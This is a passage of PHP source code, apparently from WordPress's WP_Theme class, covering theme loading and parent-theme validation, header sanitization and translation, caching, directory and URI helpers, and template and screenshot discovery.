'template' => $this->template,
)
);
if ( ! file_exists( $this->theme_root ) ) { // Don't cache this one.
$this->errors->add( 'theme_root_missing', __( '<strong>Error:</strong> The themes directory is either empty or does not exist. Please check your installation.' ) );
}
return;
} elseif ( ! is_readable( $this->theme_root . '/' . $theme_file ) ) {
$this->headers['Name'] = $this->stylesheet;
$this->errors = new WP_Error( 'theme_stylesheet_not_readable', __( 'Stylesheet is not readable.' ) );
$this->template = $this->stylesheet;
$this->block_theme = false;
$this->block_template_folders = $this->default_template_folders;
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->block_template_folders,
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
return;
} else {
$this->headers = get_file_data( $this->theme_root . '/' . $theme_file, self::$file_headers, 'theme' );
/*
* Default themes always trump their pretenders.
* Properly identify default themes that are inside a directory within wp-content/themes.
*/
$default_theme_slug = array_search( $this->headers['Name'], self::$default_themes, true );
if ( $default_theme_slug ) {
if ( basename( $this->stylesheet ) !== $default_theme_slug ) {
$this->headers['Name'] .= '/' . $this->stylesheet;
}
}
}
if ( ! $this->template && $this->stylesheet === $this->headers['Template'] ) {
$this->errors = new WP_Error(
'theme_child_invalid',
sprintf(
/* translators: %s: Template. */
__( 'The theme defines itself as its parent theme. Please check the %s header.' ),
'<code>Template</code>'
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
)
);
return;
}
// (If template is set from cache [and there are no errors], we know it's good.)
if ( ! $this->template ) {
$this->template = $this->headers['Template'];
}
if ( ! $this->template ) {
$this->template = $this->stylesheet;
$theme_path = $this->theme_root . '/' . $this->stylesheet;
if ( ! $this->is_block_theme() && ! file_exists( $theme_path . '/index.php' ) ) {
$error_message = sprintf(
/* translators: 1: templates/index.html, 2: index.php, 3: Documentation URL, 4: Template, 5: style.css */
__( 'Template is missing. Standalone themes need to have a %1$s or %2$s template file. <a href="%3$s">Child themes</a> need to have a %4$s header in the %5$s stylesheet.' ),
'<code>templates/index.html</code>',
'<code>index.php</code>',
__( 'https://developer.wordpress.org/themes/advanced-topics/child-themes/' ),
'<code>Template</code>',
'<code>style.css</code>'
);
$this->errors = new WP_Error( 'theme_no_index', $error_message );
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
return;
}
}
// If we got our data from cache, we can assume that 'template' is pointing to the right place.
if ( ! is_array( $cache )
&& $this->template !== $this->stylesheet
&& ! file_exists( $this->theme_root . '/' . $this->template . '/index.php' )
) {
/*
* If we're in a directory of themes inside /themes, look for the parent nearby.
* wp-content/themes/directory-of-themes/*
*/
$parent_dir = dirname( $this->stylesheet );
$directories = search_theme_directories();
if ( '.' !== $parent_dir
&& file_exists( $this->theme_root . '/' . $parent_dir . '/' . $this->template . '/index.php' )
) {
$this->template = $parent_dir . '/' . $this->template;
} elseif ( $directories && isset( $directories[ $this->template ] ) ) {
/*
* Look for the template in the search_theme_directories() results, in case it is in another theme root.
* We don't look into directories of themes, just the theme root.
*/
$theme_root_template = $directories[ $this->template ]['theme_root'];
} else {
// Parent theme is missing.
$this->errors = new WP_Error(
'theme_no_parent',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The parent theme is missing. Please install the "%s" parent theme.' ),
esc_html( $this->template )
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
$this->parent = new WP_Theme( $this->template, $this->theme_root, $this );
return;
}
}
// Set the parent, if we're a child theme.
if ( $this->template !== $this->stylesheet ) {
// If we are a parent, then there is a problem. Only two generations allowed! Cancel things out.
if ( $_child instanceof WP_Theme && $_child->template === $this->stylesheet ) {
$_child->parent = null;
$_child->errors = new WP_Error(
'theme_parent_invalid',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The "%s" theme is not a valid parent theme.' ),
esc_html( $_child->template )
)
);
$_child->cache_add(
'theme',
array(
'block_template_folders' => $_child->get_block_template_folders(),
'block_theme' => $_child->is_block_theme(),
'headers' => $_child->headers,
'errors' => $_child->errors,
'stylesheet' => $_child->stylesheet,
'template' => $_child->template,
)
);
// The two themes actually reference each other with the Template header.
if ( $_child->stylesheet === $this->template ) {
$this->errors = new WP_Error(
'theme_parent_invalid',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The "%s" theme is not a valid parent theme.' ),
esc_html( $this->template )
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
}
return;
}
// Set the parent. Pass the current instance so we can do the checks above and assess errors.
$this->parent = new WP_Theme( $this->template, isset( $theme_root_template ) ? $theme_root_template : $this->theme_root, $this );
}
if ( wp_paused_themes()->get( $this->stylesheet ) && ( ! is_wp_error( $this->errors ) || ! isset( $this->errors->errors['theme_paused'] ) ) ) {
$this->errors = new WP_Error( 'theme_paused', __( 'This theme failed to load properly and was paused within the admin backend.' ) );
}
// We're good. If we didn't retrieve from cache, set it.
if ( ! is_array( $cache ) ) {
$cache = array(
'block_theme' => $this->is_block_theme(),
'block_template_folders' => $this->get_block_template_folders(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
);
// If the parent theme is in another root, we'll want to cache this. Avoids an entire branch of filesystem calls above.
if ( isset( $theme_root_template ) ) {
$cache['theme_root_template'] = $theme_root_template;
}
$this->cache_add( 'theme', $cache );
}
}
/**
* When converting the object to a string, the theme name is returned.
*
* @since 3.4.0
*
* @return string Theme name, ready for display (translated)
*/
public function __toString() {
return (string) $this->display( 'Name' );
}
/**
* __isset() magic method for properties formerly returned by current_theme_info()
*
* @since 3.4.0
*
* @param string $offset Property to check if set.
* @return bool Whether the given property is set.
*/
public function __isset( $offset ) {
static $properties = array(
'name',
'title',
'version',
'parent_theme',
'template_dir',
'stylesheet_dir',
'template',
'stylesheet',
'screenshot',
'description',
'author',
'tags',
'theme_root',
'theme_root_uri',
);
return in_array( $offset, $properties, true );
}
/**
* __get() magic method for properties formerly returned by current_theme_info()
*
* @since 3.4.0
*
* @param string $offset Property to get.
* @return mixed Property value.
*/
public function __get( $offset ) {
switch ( $offset ) {
case 'name':
case 'title':
return $this->get( 'Name' );
case 'version':
return $this->get( 'Version' );
case 'parent_theme':
return $this->parent() ? $this->parent()->get( 'Name' ) : '';
case 'template_dir':
return $this->get_template_directory();
case 'stylesheet_dir':
return $this->get_stylesheet_directory();
case 'template':
return $this->get_template();
case 'stylesheet':
return $this->get_stylesheet();
case 'screenshot':
return $this->get_screenshot( 'relative' );
// 'author' and 'description' did not previously return translated data.
case 'description':
return $this->display( 'Description' );
case 'author':
return $this->display( 'Author' );
case 'tags':
return $this->get( 'Tags' );
case 'theme_root':
return $this->get_theme_root();
case 'theme_root_uri':
return $this->get_theme_root_uri();
// For cases where the array was converted to an object.
default:
return $this->offsetGet( $offset );
}
}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
* @param mixed $value
*/
#[ReturnTypeWillChange]
public function offsetSet( $offset, $value ) {}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
*/
#[ReturnTypeWillChange]
public function offsetUnset( $offset ) {}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
* @return bool
*/
#[ReturnTypeWillChange]
public function offsetExists( $offset ) {
static $keys = array(
'Name',
'Version',
'Status',
'Title',
'Author',
'Author Name',
'Author URI',
'Description',
'Template',
'Stylesheet',
'Template Files',
'Stylesheet Files',
'Template Dir',
'Stylesheet Dir',
'Screenshot',
'Tags',
'Theme Root',
'Theme Root URI',
'Parent Theme',
);
return in_array( $offset, $keys, true );
}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes().
*
* Author, Author Name, Author URI, and Description did not previously return
* translated data. We are doing so now as it is safe to do. However, as
* Name and Title could have been used as the key for get_themes(), both remain
* untranslated for back compatibility. This means that ['Name'] is not ideal,
* and care should be taken to use `$theme::display( 'Name' )` to get a properly
* translated header.
*
* @since 3.4.0
*
* @param mixed $offset
* @return mixed
*/
#[ReturnTypeWillChange]
public function offsetGet( $offset ) {
switch ( $offset ) {
case 'Name':
case 'Title':
/*
* See note above about using translated data. get() is not ideal.
* It is only for backward compatibility. Use display().
*/
return $this->get( 'Name' );
case 'Author':
return $this->display( 'Author' );
case 'Author Name':
return $this->display( 'Author', false );
case 'Author URI':
return $this->display( 'AuthorURI' );
case 'Description':
return $this->display( 'Description' );
case 'Version':
case 'Status':
return $this->get( $offset );
case 'Template':
return $this->get_template();
case 'Stylesheet':
return $this->get_stylesheet();
case 'Template Files':
return $this->get_files( 'php', 1, true );
case 'Stylesheet Files':
return $this->get_files( 'css', 0, false );
case 'Template Dir':
return $this->get_template_directory();
case 'Stylesheet Dir':
return $this->get_stylesheet_directory();
case 'Screenshot':
return $this->get_screenshot( 'relative' );
case 'Tags':
return $this->get( 'Tags' );
case 'Theme Root':
return $this->get_theme_root();
case 'Theme Root URI':
return $this->get_theme_root_uri();
case 'Parent Theme':
return $this->parent() ? $this->parent()->get( 'Name' ) : '';
default:
return null;
}
}
/**
* Returns errors property.
*
* @since 3.4.0
*
* @return WP_Error|false WP_Error if there are errors, or false.
*/
public function errors() {
return is_wp_error( $this->errors ) ? $this->errors : false;
}
/**
* Determines whether the theme exists.
*
* A theme with errors exists. A theme with the error of 'theme_not_found',
* meaning that the theme's directory was not found, does not exist.
*
* @since 3.4.0
*
* @return bool Whether the theme exists.
*/
public function exists() {
return ! ( $this->errors() && in_array( 'theme_not_found', $this->errors()->get_error_codes(), true ) );
}
/**
* Returns reference to the parent theme.
*
* @since 3.4.0
*
* @return WP_Theme|false Parent theme, or false if the active theme is not a child theme.
*/
public function parent() {
return isset( $this->parent ) ? $this->parent : false;
}
/**
* Perform reinitialization tasks.
*
* Prevents a callback from being injected during unserialization of an object.
*/
public function __wakeup() {
if ( $this->parent && ! $this->parent instanceof self ) {
throw new UnexpectedValueException();
}
if ( $this->headers && ! is_array( $this->headers ) ) {
throw new UnexpectedValueException();
}
foreach ( $this->headers as $value ) {
if ( ! is_string( $value ) ) {
throw new UnexpectedValueException();
}
}
$this->headers_sanitized = array();
}
/**
* Adds theme data to cache.
*
* Cache entries keyed by the theme and the type of data.
*
* @since 3.4.0
*
* @param string $key Type of data to store (theme, screenshot, headers, post_templates)
* @param array|string $data Data to store
* @return bool Return value from wp_cache_add()
*/
private function cache_add( $key, $data ) {
return wp_cache_add( $key . '-' . $this->cache_hash, $data, 'themes', self::$cache_expiration );
}
/**
* Gets theme data from cache.
*
* Cache entries are keyed by the theme and the type of data.
*
* @since 3.4.0
*
* @param string $key Type of data to retrieve (theme, screenshot, headers, post_templates)
* @return mixed Retrieved data
*/
private function cache_get( $key ) {
return wp_cache_get( $key . '-' . $this->cache_hash, 'themes' );
}
/**
* Clears the cache for the theme.
*
* @since 3.4.0
*/
public function cache_delete() {
foreach ( array( 'theme', 'screenshot', 'headers', 'post_templates' ) as $key ) {
wp_cache_delete( $key . '-' . $this->cache_hash, 'themes' );
}
$this->template = null;
$this->textdomain_loaded = null;
$this->theme_root_uri = null;
$this->parent = null;
$this->errors = null;
$this->headers_sanitized = null;
$this->name_translated = null;
$this->block_theme = null;
$this->block_template_folders = null;
$this->headers = array();
$this->__construct( $this->stylesheet, $this->theme_root );
$this->delete_pattern_cache();
}
/**
* Gets a raw, unformatted theme header.
*
* The header is sanitized, but is not translated, and is not marked up for display.
* To get a theme header for display, use the display() method.
*
* Use the get_template() method, not the 'Template' header, for finding the template.
* The 'Template' header is only good for what was written in the style.css, while
* get_template() takes into account where WordPress actually located the theme and
* whether it is actually valid.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @return string|array|false String or array (for Tags header) on success, false on failure.
*/
public function get( $header ) {
if ( ! isset( $this->headers[ $header ] ) ) {
return false;
}
if ( ! isset( $this->headers_sanitized ) ) {
$this->headers_sanitized = $this->cache_get( 'headers' );
if ( ! is_array( $this->headers_sanitized ) ) {
$this->headers_sanitized = array();
}
}
if ( isset( $this->headers_sanitized[ $header ] ) ) {
return $this->headers_sanitized[ $header ];
}
// If themes are a persistent group, sanitize everything and cache it. One cache add is better than many cache sets.
if ( self::$persistently_cache ) {
foreach ( array_keys( $this->headers ) as $_header ) {
$this->headers_sanitized[ $_header ] = $this->sanitize_header( $_header, $this->headers[ $_header ] );
}
$this->cache_add( 'headers', $this->headers_sanitized );
} else {
$this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );
}
return $this->headers_sanitized[ $header ];
}
/**
* Gets a theme header, formatted and translated for display.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param bool $markup Optional. Whether to mark up the header. Defaults to true.
* @param bool $translate Optional. Whether to translate the header. Defaults to true.
* @return string|array|false Processed header. An array for Tags if `$markup` is false, string otherwise.
* False on failure.
*/
public function display( $header, $markup = true, $translate = true ) {
$value = $this->get( $header );
if ( false === $value ) {
return false;
}
if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) ) {
$translate = false;
}
if ( $translate ) {
$value = $this->translate_header( $header, $value );
}
if ( $markup ) {
$value = $this->markup_header( $header, $value, $translate );
}
return $value;
}
/**
* Sanitizes a theme header.
*
* @since 3.4.0
* @since 5.4.0 Added support for `Requires at least` and `Requires PHP` headers.
* @since 6.1.0 Added support for `Update URI` header.
*
* @param string $header Theme header. Accepts 'Name', 'Description', 'Author', 'Version',
* 'ThemeURI', 'AuthorURI', 'Status', 'Tags', 'RequiresWP', 'RequiresPHP',
* 'UpdateURI'.
* @param string $value Value to sanitize.
* @return string|array An array for Tags header, string otherwise.
*/
private function sanitize_header( $header, $value ) {
switch ( $header ) {
case 'Status':
if ( ! $value ) {
$value = 'publish';
break;
}
// Fall through otherwise.
case 'Name':
static $header_tags = array(
'abbr' => array( 'title' => true ),
'acronym' => array( 'title' => true ),
'code' => true,
'em' => true,
'strong' => true,
);
$value = wp_kses( $value, $header_tags );
break;
case 'Author':
// There shouldn't be anchor tags in Author, but some themes like to be challenging.
case 'Description':
static $header_tags_with_a = array(
'a' => array(
'href' => true,
'title' => true,
),
'abbr' => array( 'title' => true ),
'acronym' => array( 'title' => true ),
'code' => true,
'em' => true,
'strong' => true,
);
$value = wp_kses( $value, $header_tags_with_a );
break;
case 'ThemeURI':
case 'AuthorURI':
$value = sanitize_url( $value );
break;
case 'Tags':
$value = array_filter( array_map( 'trim', explode( ',', strip_tags( $value ) ) ) );
break;
case 'Version':
case 'RequiresWP':
case 'RequiresPHP':
case 'UpdateURI':
$value = strip_tags( $value );
break;
}
return $value;
}
/**
* Marks up a theme header.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param string|array $value Value to mark up. An array for Tags header, string otherwise.
* @param string $translate Whether the header has been translated.
* @return string Value, marked up.
*/
private function markup_header( $header, $value, $translate ) {
switch ( $header ) {
case 'Name':
if ( empty( $value ) ) {
$value = esc_html( $this->get_stylesheet() );
}
break;
case 'Description':
$value = wptexturize( $value );
break;
case 'Author':
if ( $this->get( 'AuthorURI' ) ) {
$value = sprintf( '<a href="%1$s">%2$s</a>', $this->display( 'AuthorURI', true, $translate ), $value );
} elseif ( ! $value ) {
$value = __( 'Anonymous' );
}
break;
case 'Tags':
static $comma = null;
if ( ! isset( $comma ) ) {
$comma = wp_get_list_item_separator();
}
$value = implode( $comma, $value );
break;
case 'ThemeURI':
case 'AuthorURI':
$value = esc_url( $value );
break;
}
return $value;
}
/**
* Translates a theme header.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param string|array $value Value to translate. An array for Tags header, string otherwise.
* @return string|array Translated value. An array for Tags header, string otherwise.
*/
private function translate_header( $header, $value ) {
switch ( $header ) {
case 'Name':
// Cached for sorting reasons.
if ( isset( $this->name_translated ) ) {
return $this->name_translated;
}
// phpcs:ignore WordPress.WP.I18n.LowLevelTranslationFunction,WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain
$this->name_translated = translate( $value, $this->get( 'TextDomain' ) );
return $this->name_translated;
case 'Tags':
if ( empty( $value ) || ! function_exists( 'get_theme_feature_list' ) ) {
return $value;
}
static $tags_list;
if ( ! isset( $tags_list ) ) {
$tags_list = array(
// As of 4.6, deprecated tags which are only used to provide translation for older themes.
'black' => __( 'Black' ),
'blue' => __( 'Blue' ),
'brown' => __( 'Brown' ),
'gray' => __( 'Gray' ),
'green' => __( 'Green' ),
'orange' => __( 'Orange' ),
'pink' => __( 'Pink' ),
'purple' => __( 'Purple' ),
'red' => __( 'Red' ),
'silver' => __( 'Silver' ),
'tan' => __( 'Tan' ),
'white' => __( 'White' ),
'yellow' => __( 'Yellow' ),
'dark' => _x( 'Dark', 'color scheme' ),
'light' => _x( 'Light', 'color scheme' ),
'fixed-layout' => __( 'Fixed Layout' ),
'fluid-layout' => __( 'Fluid Layout' ),
'responsive-layout' => __( 'Responsive Layout' ),
'blavatar' => __( 'Blavatar' ),
'photoblogging' => __( 'Photoblogging' ),
'seasonal' => __( 'Seasonal' ),
);
$feature_list = get_theme_feature_list( false ); // No API.
foreach ( $feature_list as $tags ) {
$tags_list += $tags;
}
}
foreach ( $value as &$tag ) {
if ( isset( $tags_list[ $tag ] ) ) {
$tag = $tags_list[ $tag ];
} elseif ( isset( self::$tag_map[ $tag ] ) ) {
$tag = $tags_list[ self::$tag_map[ $tag ] ];
}
}
return $value;
default:
// phpcs:ignore WordPress.WP.I18n.LowLevelTranslationFunction,WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain
$value = translate( $value, $this->get( 'TextDomain' ) );
}
return $value;
}
/**
* Returns the directory name of the theme's "stylesheet" files, inside the theme root.
*
* In the case of a child theme, this is directory name of the child theme.
* Otherwise, get_stylesheet() is the same as get_template().
*
* @since 3.4.0
*
* @return string Stylesheet
*/
public function get_stylesheet() {
return $this->stylesheet;
}
/**
* Returns the directory name of the theme's "template" files, inside the theme root.
*
* In the case of a child theme, this is the directory name of the parent theme.
* Otherwise, the get_template() is the same as get_stylesheet().
*
* @since 3.4.0
*
* @return string Template
*/
public function get_template() {
return $this->template;
}
/**
* Returns the absolute path to the directory of a theme's "stylesheet" files.
*
* In the case of a child theme, this is the absolute path to the directory
* of the child theme's files.
*
* @since 3.4.0
*
* @return string Absolute path of the stylesheet directory.
*/
public function get_stylesheet_directory() {
if ( $this->errors() && in_array( 'theme_root_missing', $this->errors()->get_error_codes(), true ) ) {
return '';
}
return $this->theme_root . '/' . $this->stylesheet;
}
/**
* Returns the absolute path to the directory of a theme's "template" files.
*
* In the case of a child theme, this is the absolute path to the directory
* of the parent theme's files.
*
* @since 3.4.0
*
* @return string Absolute path of the template directory.
*/
public function get_template_directory() {
if ( $this->parent() ) {
$theme_root = $this->parent()->theme_root;
} else {
$theme_root = $this->theme_root;
}
return $theme_root . '/' . $this->template;
}
/**
* Returns the URL to the directory of a theme's "stylesheet" files.
*
* In the case of a child theme, this is the URL to the directory of the
* child theme's files.
*
* @since 3.4.0
*
* @return string URL to the stylesheet directory.
*/
public function get_stylesheet_directory_uri() {
return $this->get_theme_root_uri() . '/' . str_replace( '%2F', '/', rawurlencode( $this->stylesheet ) );
}
/**
* Returns the URL to the directory of a theme's "template" files.
*
* In the case of a child theme, this is the URL to the directory of the
* parent theme's files.
*
* @since 3.4.0
*
* @return string URL to the template directory.
*/
public function get_template_directory_uri() {
if ( $this->parent() ) {
$theme_root_uri = $this->parent()->get_theme_root_uri();
} else {
$theme_root_uri = $this->get_theme_root_uri();
}
return $theme_root_uri . '/' . str_replace( '%2F', '/', rawurlencode( $this->template ) );
}
/**
* Returns the absolute path to the directory of the theme root.
*
* This is typically the absolute path to wp-content/themes.
*
* @since 3.4.0
*
* @return string Theme root.
*/
public function get_theme_root() {
return $this->theme_root;
}
/**
* Returns the URL to the directory of the theme root.
*
* This is typically the absolute URL to wp-content/themes. This forms the basis
* for all other URLs returned by WP_Theme, so we pass it to the public function
* get_theme_root_uri() and allow it to run the {@see 'theme_root_uri'} filter.
*
* @since 3.4.0
*
* @return string Theme root URI.
*/
public function get_theme_root_uri() {
if ( ! isset( $this->theme_root_uri ) ) {
$this->theme_root_uri = get_theme_root_uri( $this->stylesheet, $this->theme_root );
}
return $this->theme_root_uri;
}
/**
* Returns the main screenshot file for the theme.
*
* The main screenshot is called screenshot.png. gif and jpg extensions are also allowed.
*
* Screenshots for a theme must be in the stylesheet directory. (In the case of child
* themes, parent theme screenshots are not inherited.)
*
* @since 3.4.0
*
* @param string $uri Type of URL to return, either 'relative' or an absolute URI. Defaults to absolute URI.
* @return string|false Screenshot file. False if the theme does not have a screenshot.
*/
public function get_screenshot( $uri = 'uri' ) {
$screenshot = $this->cache_get( 'screenshot' );
if ( $screenshot ) {
if ( 'relative' === $uri ) {
return $screenshot;
}
return $this->get_stylesheet_directory_uri() . '/' . $screenshot;
} elseif ( 0 === $screenshot ) {
return false;
}
foreach ( array( 'png', 'gif', 'jpg', 'jpeg', 'webp', 'avif' ) as $ext ) {
if ( file_exists( $this->get_stylesheet_directory() . "/screenshot.$ext" ) ) {
$this->cache_add( 'screenshot', 'screenshot.' . $ext );
if ( 'relative' === $uri ) {
return 'screenshot.' . $ext;
}
return $this->get_stylesheet_directory_uri() . '/' . 'screenshot.' . $ext;
}
}
$this->cache_add( 'screenshot', 0 );
return false;
}
/**
* Returns files in the theme's directory.
*
* @since 3.4.0
*
* @param string[]|string $type Optional. Array of extensions to find, string of a single extension,
* or null for all extensions. Default null.
* @param int $depth Optional. How deep to search for files. Defaults to a flat scan (0 depth).
* -1 depth is infinite.
* @param bool $search_parent Optional. Whether to return parent files. Default false.
* @return string[] Array of files, keyed by the path to the file relative to the theme's directory, with the values
* being absolute paths.
*/
public function get_files( $type = null, $depth = 0, $search_parent = false ) {
$files = (array) self::scandir( $this->get_stylesheet_directory(), $type, $depth );
if ( $search_parent && $this->parent() ) {
$files += (array) self::scandir( $this->get_template_directory(), $type, $depth );
}
return array_filter( $files );
}
/**
* Returns the theme's post templates.
*
* @since 4.7.0
* @since 5.8.0 Include block templates.
*
* @return array[] Array of page template arrays, keyed by post type and filename,
* with the value of the translated header name.
*/
public function get_post_templates() {
// If you screw up your active theme and we invalidate your parent, most things still work. Let it slide.
if ( $this->errors() && $this->errors()->get_error_codes() !== array( 'theme_parent_invalid' ) ) {
return array();
}
$post_templates = $this->cache_get( 'post_templates' );
if ( ! is_array( $post_templates ) ) {
$post_templates = array();
$files = (array) $this->get_files( 'php', 1, true );
foreach ( $files as $file => $full_path ) {
if ( ! preg_match( '|Template Name:(.*)$|mi', file_get_contents( $full_path ), $header ) ) {
continue;
}
$types = array( 'page' );
if ( preg_match( '|Template Post Type:(.*)$|mi', file_get_contents( $full_path ), $type ) ) {
$types = explode( ',', _cleanup_header_comment( $type[1] ) );
}
foreach ( $types as $type ) {
$type = sanitize_key( $type );
if ( ! isset( $post_templates[ $type ] ) ) {
$post_templates[ $type ] = array();
}
$post_templates[ $type ][ $file ] = _cleanup_header_comment( $header[1] );
}
}
$this->cache_add( 'post_templates', $post_templates );
}
if ( current_theme_supports( 'block-templates' ) ) {
$block_templates = get_block_templates( array(), 'wp_template' );
foreach ( get_post_types( array( 'public' => true ) ) as $type ) {
foreach ( $block_templates as $block_template ) {
if ( ! $block_template->is_custom ) {
continue;
}
if ( isset( $block_template->post_types ) && ! in_array( $type, $block_template->post_types, true ) ) {
continue;
}
$post_templates[ $type ][ $block_template->slug ] = $block_template->title;
}
}
}
if ( $this->load_textdomain() ) {
foreach ( $post_templates as &$post_type ) {
foreach ( $post_type as &$post_template ) {
$post_template = $this->translate_header( 'Template Name', $post_template );
}
}
}
return $post_templates;
}
/**
* Returns the theme's post templates for a given post type.
*
* @since 3.4.0
* @since 4.7.0 Added the `$post_type` parameter.
*
* @param WP_Post|null $post Optional. The post being edited, provided for context.
* @param string $post_type Optional. Post type to get the templates for. Default 'page'.
* If a post is provided, its post type is used.
* @return string[] Array of template header names keyed by the template file name.
*/
public function get_page_templates( $post = null, $post_type = 'page' ) {
if ( $post ) {
$post_type = get_post_type( $post );
}
$post_templates = $this->get_post_templates();
$post_templates = isset( $post_templates[ $post_type ] ) ? $post_templates[ $post_type ] : array();
/**
* Filters list of page templates for a theme.
*
* @since 4.9.6
*
* @param string[] $post_templates Array of template header names keyed by the template file name.
* @param WP_Theme $theme The theme object.
* @param WP_Post|null $post The post being edited, provided for context, or null.
* @param string $post_type Post type to get the templates for.
*/
$post_templates = (array) apply_filters( 'theme_templates', $post_templates, $this, $post, $post_type );
/**
* Filters list of page templates for a theme.
*
* The dynamic portion of the hook name, `$post_type`, refers to the post type.
*
* Possible hook names include:
*
* - `theme_post_templates`
* - `theme_page_templates`
* - `theme_attachment_templates`
*
* @since 3.9.0
* @since 4.4.0 Converted to allow complete control over the `$page_templates` array.
* @since 4.7.0 Added the `$post_type` parameter.
*
* @param string[] $post_templates Array of template header names keyed by the template file name.
* @param WP_Theme $theme The theme object.
* @param WP_Post|null $post The post being edited, provided for context, or null.
* @param string $post_type Post type to get the templates for.
*/
$post_templates = (array) apply_filters( "theme_{$post_type}_templates", $post_templates, $this, $post, $post_type );
return $post_templates;
}
/**
* Scans a directory for files of a certain extension.
*
* @since 3.4.0
*
* @param string $path Absolute path to search.
* @param array|string|null $extensions Optional. Array of extensions to find, string of a single extension,
* or null for all extensions. Default null.
* @param int $depth Optional. How many levels deep to search for files. Accepts 0, 1+, or
* -1 (infinite depth). Default 0.
* @param string $relative_path Optional. The basename of the absolute path. Used to control the
* returned path for the found files, particularly when this function
* recurses to lower depths. Default empty.
* @return string[]|false Array of files, keyed by the path to the file relative to the `$path` directory prepended
* with `$relative_path`, with the values being absolute paths. False otherwise.
*/
private static function scandir( $path, $extensions = null, $depth = 0, $relative_path = '' ) {
if ( ! is_dir( $path ) ) {
return false;
}
if ( $extensions ) {
$extensions = (array) $extensions;
$_extensions = implode( '|', $extensions );
}
$relative_path = trailingslashit( $relative_path );
if ( '/' === $relative_path ) {
$relative_path = '';
}
$results = scandir( $path );
$files = array();
/**
* Filters the array of excluded directories and files while scanning theme folder.
*
* @since 4.7.4
*
* @param string[] $exclusions Array of excluded directories and files.
*/
$exclusions = (array) apply_filters( 'theme_scandir_exclusions', array( 'CVS', 'node_modules', 'vendor', 'bower_components' ) );
foreach ( $results as $result ) {
if ( '.' === $result[0] || in_array( $result, $exclusions, true ) ) {
continue;
}
if ( is_dir( $path . '/' . $result ) ) {
if ( ! $depth ) {
continue;
}
$found = self::scandir( $path . '/' . $result, $extensions, $depth - 1, $relative_path . $result );
$files = array_merge_recursive( $files, $found );
} elseif ( ! $extensions || preg_match( '~\.(' . $_extensions . ')$~', $result ) ) {
$files[ $relative_path . $result ] = $path . '/' . $result;
}
}
return $files;
}
/**
* Loads the theme's textdomain.
*
* Translation files are not inherited from the parent theme. TODO: If this fails for the
* child theme, it should probably try to load the parent theme's translations.
*
* @since 3.4.0
*
* @return bool True if the textdomain was successfully loaded or has already been loaded.
* False if no textdomain was specified in the file headers, or if the domain could not be loaded.
*/
public function load_textdomain() {
if ( isset( $this->textdomain_loaded ) ) {
return $this->textdomain_loaded;
}
$textdomain = $this->get( 'TextDomain' );
if ( ! $textdomain ) {
$this->textdomain_loaded = false;
return false;
}
if ( is_textdomain_loaded( $textdomain ) ) {
$this->textdomain_loaded = true;
return true;
}
$path = $this->get_stylesheet_directory();
$domainpath = $this->get( 'DomainPath' );
if ( $domainpath ) {
$path .= $domainpath;
} else {
$path .= '/languages';
}
$this->textdomain_loaded = load_theme_textdomain( $textdomain, $path );
return $this->textdomain_loaded;
}
/**
* Determines whether the theme is allowed (multisite only).
*
* @since 3.4.0
*
* @param string $check Optional. Whether to check only the 'network'-wide settings, the 'site'
* settings, or 'both'. Defaults to 'both'.
* @param int $blog_id Optional. Ignored if only network-wide settings are checked. Defaults to current site.
* @return bool Whether the theme is allowed for the network. Returns true in single-site.
*/
public function is_allowed( $check = 'both', $blog_id = null ) {
if ( ! is_multisite() ) {
return true;
}
if ( 'both' === $check || 'network' === $check ) {
$allowed = self::get_allowed_on_network();
if ( ! empty( $allowed[ $this->get_stylesheet() ] ) ) {
return true;
}
}
if ( 'both' === $check || 'site' === $check ) {
$allowed = self::get_allowed_on_site( $blog_id );
if ( ! empty( $allowed[ $this->get_stylesheet() ] ) ) {
return true;
}
}
return false;
}
/**
* Returns whether this theme is a block-based theme or not.
*
* @since 5.9.0
*
* @return bool
*/
public function is_block_theme() {
if ( isset( $this->block_theme ) ) {
return $this->block_theme;
}
$paths_to_index_block_template = array(
$this->get_file_path( '/templates/index.html' ),
$this->get_file_path( '/block-templates/index.html' ),
);
$this->block_theme = false;
foreach ( $paths_to_index_block_template as $path_to_index_block_template ) {
